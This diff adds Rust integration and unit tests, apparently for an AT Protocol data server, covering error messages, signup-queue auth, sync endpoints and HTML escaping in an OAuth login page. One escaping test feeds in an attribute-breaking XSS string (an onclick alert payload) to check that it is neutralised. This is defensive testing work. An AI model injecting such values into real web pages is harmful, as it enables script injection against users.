assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
266
+
}
267
+
268
+
#[test]
269
+
fn test_send_error_max_retries_includes_detail() {
270
+
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
271
+
let msg = format!("{}", error);
272
+
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
273
+
}
274
+
275
+
#[tokio::test]
276
+
async fn test_check_signup_queue_accepts_session_jwt() {
277
+
use common::{base_url, client, create_account_and_login};
278
+
279
+
let base = base_url().await;
280
+
let http_client = client();
281
+
282
+
let (token, _did) = create_account_and_login(&http_client).await;
283
+
284
+
let res = http_client
285
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
286
+
.header("Authorization", format!("Bearer {}", token))
287
+
.send()
288
+
.await
289
+
.unwrap();
290
+
291
+
assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
292
+
293
+
let body: serde_json::Value = res.json().await.unwrap();
294
+
assert_eq!(body["activated"], true);
295
+
}
296
+
297
+
#[tokio::test]
298
+
async fn test_check_signup_queue_no_auth() {
299
+
use common::{base_url, client};
300
+
301
+
let base = base_url().await;
302
+
let http_client = client();
303
+
304
+
let res = http_client
305
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
306
+
.send()
307
+
.await
308
+
.unwrap();
309
+
310
+
assert_eq!(res.status(), reqwest::StatusCode::OK, "Unauthenticated requests should be accepted");
311
+
312
+
let body: serde_json::Value = res.json().await.unwrap();
313
+
assert_eq!(body["activated"], true);
314
+
}
315
+
316
+
#[test]
317
+
fn test_html_escape_ampersand() {
318
+
let html = login_page("client&test", None, None, "test-uri", None, None);
319
+
assert!(html.contains("&amp;"), "Ampersand should be escaped");
320
+
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
321
+
}
322
+
323
+
#[test]
324
+
fn test_html_escape_quotes() {
325
+
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
326
+
assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped");
327
+
assert!(html.contains("&#x27;") || html.contains("&#39;"), "Single quotes should be escaped");
328
+
}
329
+
330
+
#[test]
331
+
fn test_html_escape_angle_brackets() {
332
+
let html = login_page("client<test>more", None, None, "test-uri", None, None);
333
+
assert!(html.contains("&lt;"), "Less than should be escaped");
334
+
assert!(html.contains("&gt;"), "Greater than should be escaped");
335
+
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
336
+
}
337
+
338
+
#[test]
339
+
fn test_oauth_template_preserves_safe_content() {
340
+
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
341
+
342
+
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
343
+
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
344
+
assert!(html.contains("user@example.com"), "Login hint should be preserved");
345
+
}
346
+
347
+
#[test]
348
+
fn test_csrf_like_input_value_protection() {
349
+
let malicious = "\" onclick=\"alert('csrf')";
350
+
let html = login_page("client", None, None, malicious, None, None);
351
+
352
+
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
353
+
}
354
+
355
+
#[test]
356
+
fn test_unicode_handling_in_templates() {
357
+
let unicode_client = "客户端 クライアント";
358
+
let html = login_page(unicode_client, None, None, "test-uri", None, None);
359
+
360
+
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
361
+
}
362
+
363
+
#[test]
364
+
fn test_null_byte_in_input() {
365
+
let with_null = "client\0id";
366
+
let sanitized = sanitize_header_value(with_null);
367
+
368
+
assert!(sanitized.contains("client"), "Content before null should be preserved");
369
+
}
370
+
371
+
#[test]
372
+
fn test_very_long_input_handling() {
373
+
let long_input = "x".repeat(10000);
374
+
let sanitized = sanitize_header_value(&long_input);
375
+
376
+
assert!(!sanitized.is_empty(), "Long input should still produce output");
377
+
}
+307
tests/sync_deprecated.rs
+307
tests/sync_deprecated.rs
···
···
1
+
mod common;
2
+
mod helpers;
3
+
use common::*;
4
+
use helpers::*;
5
+
6
+
use reqwest::StatusCode;
7
+
use serde_json::Value;
8
+
9
+
#[tokio::test]
10
+
async fn test_get_head_success() {
11
+
let client = client();
12
+
let (did, _jwt) = setup_new_user("gethead-success").await;
13
+
14
+
let res = client
15
+
.get(format!(
16
+
"{}/xrpc/com.atproto.sync.getHead",
17
+
base_url().await
18
+
))
19
+
.query(&[("did", did.as_str())])
20
+
.send()
21
+
.await
22
+
.expect("Failed to send request");
23
+
24
+
assert_eq!(res.status(), StatusCode::OK);
25
+
let body: Value = res.json().await.expect("Response was not valid JSON");
26
+
assert!(body["root"].is_string());
27
+
let root = body["root"].as_str().unwrap();
28
+
assert!(root.starts_with("bafy"), "Root should be a CIDv1 string");
29
+
}
30
+
31
+
#[tokio::test]
32
+
async fn test_get_head_not_found() {
33
+
let client = client();
34
+
let res = client
35
+
.get(format!(
36
+
"{}/xrpc/com.atproto.sync.getHead",
37
+
base_url().await
38
+
))
39
+
.query(&[("did", "did:plc:nonexistent12345")])
40
+
.send()
41
+
.await
42
+
.expect("Failed to send request");
43
+
44
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
45
+
let body: Value = res.json().await.expect("Response was not valid JSON");
46
+
assert_eq!(body["error"], "HeadNotFound");
47
+
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
48
+
}
49
+
50
+
#[tokio::test]
51
+
async fn test_get_head_missing_param() {
52
+
let client = client();
53
+
let res = client
54
+
.get(format!(
55
+
"{}/xrpc/com.atproto.sync.getHead",
56
+
base_url().await
57
+
))
58
+
.send()
59
+
.await
60
+
.expect("Failed to send request");
61
+
62
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
63
+
}
64
+
65
+
#[tokio::test]
66
+
async fn test_get_head_empty_did() {
67
+
let client = client();
68
+
let res = client
69
+
.get(format!(
70
+
"{}/xrpc/com.atproto.sync.getHead",
71
+
base_url().await
72
+
))
73
+
.query(&[("did", "")])
74
+
.send()
75
+
.await
76
+
.expect("Failed to send request");
77
+
78
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
79
+
let body: Value = res.json().await.expect("Response was not valid JSON");
80
+
assert_eq!(body["error"], "InvalidRequest");
81
+
}
82
+
83
+
#[tokio::test]
84
+
async fn test_get_head_whitespace_did() {
85
+
let client = client();
86
+
let res = client
87
+
.get(format!(
88
+
"{}/xrpc/com.atproto.sync.getHead",
89
+
base_url().await
90
+
))
91
+
.query(&[("did", " ")])
92
+
.send()
93
+
.await
94
+
.expect("Failed to send request");
95
+
96
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
97
+
}
98
+
99
+
#[tokio::test]
100
+
async fn test_get_head_changes_after_record_create() {
101
+
let client = client();
102
+
let (did, jwt) = setup_new_user("gethead-changes").await;
103
+
104
+
let res1 = client
105
+
.get(format!(
106
+
"{}/xrpc/com.atproto.sync.getHead",
107
+
base_url().await
108
+
))
109
+
.query(&[("did", did.as_str())])
110
+
.send()
111
+
.await
112
+
.expect("Failed to get initial head");
113
+
let body1: Value = res1.json().await.unwrap();
114
+
let head1 = body1["root"].as_str().unwrap().to_string();
115
+
116
+
create_post(&client, &did, &jwt, "Post to change head").await;
117
+
118
+
let res2 = client
119
+
.get(format!(
120
+
"{}/xrpc/com.atproto.sync.getHead",
121
+
base_url().await
122
+
))
123
+
.query(&[("did", did.as_str())])
124
+
.send()
125
+
.await
126
+
.expect("Failed to get head after record");
127
+
let body2: Value = res2.json().await.unwrap();
128
+
let head2 = body2["root"].as_str().unwrap().to_string();
129
+
130
+
assert_ne!(head1, head2, "Head CID should change after record creation");
131
+
}
132
+
133
+
#[tokio::test]
134
+
async fn test_get_checkout_success() {
135
+
let client = client();
136
+
let (did, jwt) = setup_new_user("getcheckout-success").await;
137
+
138
+
create_post(&client, &did, &jwt, "Post for checkout test").await;
139
+
140
+
let res = client
141
+
.get(format!(
142
+
"{}/xrpc/com.atproto.sync.getCheckout",
143
+
base_url().await
144
+
))
145
+
.query(&[("did", did.as_str())])
146
+
.send()
147
+
.await
148
+
.expect("Failed to send request");
149
+
150
+
assert_eq!(res.status(), StatusCode::OK);
151
+
assert_eq!(
152
+
res.headers()
153
+
.get("content-type")
154
+
.and_then(|h| h.to_str().ok()),
155
+
Some("application/vnd.ipld.car")
156
+
);
157
+
let body = res.bytes().await.expect("Failed to get body");
158
+
assert!(!body.is_empty(), "CAR file should not be empty");
159
+
assert!(body.len() > 50, "CAR file should contain actual data");
160
+
}
161
+
162
+
#[tokio::test]
163
+
async fn test_get_checkout_not_found() {
164
+
let client = client();
165
+
let res = client
166
+
.get(format!(
167
+
"{}/xrpc/com.atproto.sync.getCheckout",
168
+
base_url().await
169
+
))
170
+
.query(&[("did", "did:plc:nonexistent12345")])
171
+
.send()
172
+
.await
173
+
.expect("Failed to send request");
174
+
175
+
assert_eq!(res.status(), StatusCode::NOT_FOUND);
176
+
let body: Value = res.json().await.expect("Response was not valid JSON");
177
+
assert_eq!(body["error"], "RepoNotFound");
178
+
}
179
+
180
+
#[tokio::test]
181
+
async fn test_get_checkout_missing_param() {
182
+
let client = client();
183
+
let res = client
184
+
.get(format!(
185
+
"{}/xrpc/com.atproto.sync.getCheckout",
186
+
base_url().await
187
+
))
188
+
.send()
189
+
.await
190
+
.expect("Failed to send request");
191
+
192
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
193
+
}
194
+
195
+
#[tokio::test]
196
+
async fn test_get_checkout_empty_did() {
197
+
let client = client();
198
+
let res = client
199
+
.get(format!(
200
+
"{}/xrpc/com.atproto.sync.getCheckout",
201
+
base_url().await
202
+
))
203
+
.query(&[("did", "")])
204
+
.send()
205
+
.await
206
+
.expect("Failed to send request");
207
+
208
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
209
+
}
210
+
211
+
#[tokio::test]
212
+
async fn test_get_checkout_empty_repo() {
213
+
let client = client();
214
+
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
215
+
216
+
let res = client
217
+
.get(format!(
218
+
"{}/xrpc/com.atproto.sync.getCheckout",
219
+
base_url().await
220
+
))
221
+
.query(&[("did", did.as_str())])
222
+
.send()
223
+
.await
224
+
.expect("Failed to send request");
225
+
226
+
assert_eq!(res.status(), StatusCode::OK);
227
+
let body = res.bytes().await.expect("Failed to get body");
228
+
assert!(!body.is_empty(), "Even an empty repo should return a CAR header");
229
+
}
230
+
231
+
#[tokio::test]
232
+
async fn test_get_checkout_includes_multiple_records() {
233
+
let client = client();
234
+
let (did, jwt) = setup_new_user("getcheckout-multi").await;
235
+
236
+
for i in 0..5 {
237
+
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
238
+
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
239
+
}
240
+
241
+
let res = client
242
+
.get(format!(
243
+
"{}/xrpc/com.atproto.sync.getCheckout",
244
+
base_url().await
245
+
))
246
+
.query(&[("did", did.as_str())])
247
+
.send()
248
+
.await
249
+
.expect("Failed to send request");
250
+
251
+
assert_eq!(res.status(), StatusCode::OK);
252
+
let body = res.bytes().await.expect("Failed to get body");
253
+
assert!(body.len() > 500, "CAR file with 5 records should be larger");
254
+
}
255
+
256
+
#[tokio::test]
257
+
async fn test_get_head_matches_latest_commit() {
258
+
let client = client();
259
+
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
260
+
261
+
let head_res = client
262
+
.get(format!(
263
+
"{}/xrpc/com.atproto.sync.getHead",
264
+
base_url().await
265
+
))
266
+
.query(&[("did", did.as_str())])
267
+
.send()
268
+
.await
269
+
.expect("Failed to get head");
270
+
let head_body: Value = head_res.json().await.unwrap();
271
+
let head_root = head_body["root"].as_str().unwrap();
272
+
273
+
let latest_res = client
274
+
.get(format!(
275
+
"{}/xrpc/com.atproto.sync.getLatestCommit",
276
+
base_url().await
277
+
))
278
+
.query(&[("did", did.as_str())])
279
+
.send()
280
+
.await
281
+
.expect("Failed to get latest commit");
282
+
let latest_body: Value = latest_res.json().await.unwrap();
283
+
let latest_cid = latest_body["cid"].as_str().unwrap();
284
+
285
+
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
286
+
}
287
+
288
+
#[tokio::test]
289
+
async fn test_get_checkout_car_header_valid() {
290
+
let client = client();
291
+
let (did, _jwt) = setup_new_user("getcheckout-header").await;
292
+
293
+
let res = client
294
+
.get(format!(
295
+
"{}/xrpc/com.atproto.sync.getCheckout",
296
+
base_url().await
297
+
))
298
+
.query(&[("did", did.as_str())])
299
+
.send()
300
+
.await
301
+
.expect("Failed to send request");
302
+
303
+
assert_eq!(res.status(), StatusCode::OK);
304
+
let body = res.bytes().await.expect("Failed to get body");
305
+
306
+
assert!(body.len() >= 2, "CAR file should have at least header length");
307
+
}